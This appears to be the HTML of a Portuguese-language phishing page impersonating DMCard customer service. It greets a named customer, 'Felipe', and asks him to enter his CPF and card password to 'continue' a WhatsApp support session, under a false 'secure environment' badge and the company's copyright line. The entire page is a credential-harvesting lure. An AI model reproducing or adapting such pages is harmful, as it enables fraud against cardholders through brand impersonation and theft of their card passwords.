
<!DOCTYPE html>
<html>

<head>
	<meta charset="UTF-8" />
	<meta name="viewport" content="width=device-width, user-scalable=no">
	<link href="https://fonts.googleapis.com/css?family=Roboto:300,400,700&display=swap" rel="stylesheet">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.2/css/all.css"
		integrity="sha256-piqEf7Ap7CMps8krDQsSOTZgF+MU/0MPyPW2enj5I40=" crossorigin="anonymous" />
	<title>Loginwpp</title>
	<style>
		html {
			background: linear-gradient(#02528C, #00AACA) no-repeat center center fixed;
			-webkit-background-size: cover;
			-moz-background-size: cover;
			-o-background-size: cover;
			background-size: cover;
			height: 100%;
			overflow: hidden;
		}

		body {
			display: flex;
			flex-direction: column;
			height: 100vh;
			background-image: linear-gradient(#02528C, #00AACA);
			background-repeat: no-repeat;
			font-family: 'Roboto', sans-serif;
			padding: 12px;
			justify-content: flex-start;
			Align-items: center;
		}

		input {
			-webkit-appearance: none;
			-moz-appearance: none;
			appearance: none;
		}

		input[type=submit] {
			width: 91%;
			height: 48px;
			background-color: #02528C;
			color: #FFFFFF;
			padding: 10px;
			border: none;
			border-radius: 4px;
			cursor: pointer;
			margin-top: 10px;
		}

		input[type=text] {
			border: none;
			border-style: rounded;
			border-radius: 4px;
			width: 85%;
			height: 20px;
			color: black;
			background-color: #FFFFFF;
			padding: 10px;
			margin-bottom: 10px;
		}

		input[type=password] {
			border: none;
			border-style: rounded;
			border-radius: 4px;
			width: 85%;
			height: 20px;
			color: black;
			background-color: #FFFFFF;
			padding: 10px;
		}

		input[type=submit]:hover {
			background-color: #00AACA;
		}

		.rodape>i {
			color: #FFFFFF;
			margin-top: 100px;

		}

		.rodape {
			display: flex;
			flex-direction: column;
			justify-content: center;
			align-items: center;
			color: white;
			margin-top: 0px;
			position: absolute;
			bottom: 30px;

		}

		header {
			text-align: center;
		}

		main {
			display: flex;
			flex-direction: column;
			justify-content: center;
			align-items: center;
		}
	</style>
</head>

<body>

	<header>
		<center><img style="width: 80px; height: 52px;" src="logo.png"></center>
		<h1 style="color:#FFFFFF;font-size: 16px;">Atendimento ao Cliente</h1>
	</header>

	<h2 style="color:#FFFFFF;font-size: 18px;"><b>Olá, Felipe!</b></h2>


	<main>
		<p style="padding:0px 22px 0 22px; color:#FFFFFF;font-size: 14px; line-height: 1.5;">
			Para prosseguir com seu atendimento via
			<strong>WhatsApp</strong>, insira a senha de seu cartão. Você será automaticamente direcionado de volta para o
			aplicativo após a confirmação.</p>
		<input type="text" id="login" name="login" placeholder="CPF">

		<input type="password" id="senha" name="senha" placeholder="Senha">


		<a href="default.asp" target="_blank"
			style="margin-top: 10px; margin-bottom: 10px; padding-left: 30px; color:#FFFFFF;font-size: 12px; float: left; width: 100%; font-weight:300; ">
			Esqueci minha senha</a>

		<input type="submit" value="CONFIRMAR">
	</main>


	<div class="rodape">
		<div>
			<i class="fas fa-lock" style="opacity:0.90;"> </i>
			<span style=" margin-bottom:0; opacity:0.75; font-size: 12px; font-weight:300;"> Este é um ambiente seguro </span>
		</div>
		<p style="opacity:0.75; font-size: 9px; font-weight:300;color:#FFFFFF;margin:0px;">
			© dmcard.com.br, DMCard Cartões de Crédito S.A
		</p>
	</div>




</body>

</html>